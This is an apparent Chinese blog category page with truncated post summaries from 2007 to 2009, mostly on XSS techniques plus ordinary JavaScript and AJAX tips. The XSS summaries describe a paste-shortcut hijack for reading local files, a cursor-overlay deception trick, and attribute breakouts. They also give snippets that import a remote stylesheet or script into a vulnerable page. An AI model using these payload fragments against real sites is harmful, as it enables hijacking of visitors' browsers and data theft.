ASP/AJAX/SCRIPT - 随笔分类 - springside例子

Javascript Paste Keyboard Shortcuts Hijack

摘要：author : kj021320team : I.S.T.O这样的攻击手段也算是极其无耻猥琐之极! 所以防御措施一定要做好首先说一下通过Javascript Paste Keyboard Shortcuts Hijack能做什么???能够读取你本地机器任何文件! 没错!也就是说你中了任何一个XSS 加上你按了粘贴快捷键后,你就有可能被别人读取你机上任何的文件!那到底是什么回事呢? OK 我慢慢来说首先我们知道JS是无权限获读取你本地任何文件的... 那么我们必须要让用户上传自己的文件!怎么让用户上传呢? 很简单! 通过 <input type=file > 这样就能让用户阅读全文

posted @ 2009-10-10 20:52 springside例子阅读(307) 评论(0) 推荐(0)

攻击越来越趋向于猥琐了

摘要：今天一大早茄子就在群里发了这个连接 http://www.milw0rm.com/papers/265看完后JX也感叹啊，难道以后的路就是要这样猥琐吗？不禁让我想起很久以前别人提过的猥琐欺骗方式 <a href="http://blog.csdn.net/kj021320" style="cursor:url()"><img src="#" style="position:absolute;z-index:0;top:0px;width:100%; height:100%;left:0px;filter:a 阅读全文

posted @ 2008-12-30 12:22 springside例子阅读(138) 评论(0) 推荐(0)

HTTP HEADER IMPORT XSS

摘要：测试了IE 不成功TMD~~~，FF可以！import.jsp<%response.addHeader("Link", "<http://ip:8080/myweb/xss.css> ; REL=stylesheet") ;%><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><HTML><HEAD><TITLE> xss </TITLE></HEAD><BOD 阅读全文

posted @ 2008-08-25 17:43 springside例子阅读(204) 评论(0) 推荐(0)

通过getelement定位XSS SHELLCODE

摘要：今天跟AMXSA在弄一个XSS的时候就讨论到，字符长度限制了70个，该XSS是出现在<img src="xsscode"> ，后来他说对方过滤了 < > " ' 这样只能有限的调用。开始我建议他多弄几个 <img 然后代码分别写在不同的 src= 中这样间接的把代码连贯起来。后来他尝试了发现不可以对方处理 <img 头像的时候只有一个攻击点，郁闷了！想想平时我们XSS导入一个远程的JS就是为了执行更多的代码，更方便。 1.window.k=document.createElement('Script& 阅读全文

posted @ 2008-07-25 15:50 springside例子阅读(252) 评论(0) 推荐(0)

关于属性中没有对双引号转义的XSS方式 FF IE Opera通杀

摘要：某网站存在一个 storeXSS 利用点如下<input type=text value="[xsscode]">可以使用双引号绕过去属性限制，但是不能采用 < > 比较郁闷开始打算 "style="kj:expression(EXP)<input type=text value=""style="kj:expression(EXP)">后来查了查资料！发现expression是IE 才能使用的！郁闷了！而且要XSS的对象是老外，不一定会采用IE ，这样跨站攻击起来了，但是效阅读全文

posted @ 2008-07-20 10:57 springside例子阅读(762) 评论(0) 推荐(0)

VBS-JSCRIPT GETOBJECT理解

摘要：2年前,当时自己在写ASPSHELL的时候一直不理解为什么GetObject("WinNT://.") 可以获得本地系统的一些重要信息当时MSDN是这样一个解析的-----------Windows 脚本宿主 GetObject 方法请参阅WScript 对象 | CreateObject 方法 | DisconnectObject 方法用指定的 ProgID 检索现有的对象或从文件中创建新对象。object.GetObject(strPathname [,strProgID], [strPrefix]) 参数object WScript 对象。 strPathname 阅读全文

posted @ 2007-03-23 19:41 springside例子阅读(326) 评论(0) 推荐(0)

javascript 事件驱动杂谈

摘要：采用JS的时候有很多地方需要动态的添加事件驱动例如你需要为一个object 的onclick事件添加一个方法或者改变里面的方法一般人都会想起用最简单的outerHTML 来直接替换就最容易了~ 但是并不是所有的object 都支持outerHTML 写操作的那么我们就需要采用JS里面的事件动态添加了第一种方法就是对象.事件=函数object.onclick = function myfun(){alert('');}也可以这样子function mytest(){}object.onclick = mytest;这样子的方式很简单很明了第二种方法就是为事件注册多个方法阅读全文

posted @ 2007-01-17 14:26 springside例子阅读(108) 评论(0) 推荐(0)

JS获取select-option text

摘要：写JS的时候获取select对象的value是很常见的事情例如<script language="javascript">function selectInput(choose){ alert(choose.value); }</script><select name="month" onchange="selectInput(this)"> <option value="01">January</option> <option value=&qu 阅读全文

posted @ 2007-01-11 09:18 springside例子阅读(257) 评论(0) 推荐(0)

AJAX防止页面缓存

摘要：采用AJAX技术的时候通常我们无刷新页面提交数据后用同样的url去获取数据的时候会发现是以前的数据~那样就给client端带来假象了~~ 采用以下的方法可以取消缓存htm网页 <metahttp-equiv="pragma"content="no-cache"> <metahttp-equiv="cache-control"content="no-cache,must-revalidate"> <metahttp-equiv="expires"content=& 阅读全文

posted @ 2007-01-10 18:30 springside例子阅读(173) 评论(0) 推荐(0)

随笔分类 - ASP/AJAX/SCRIPT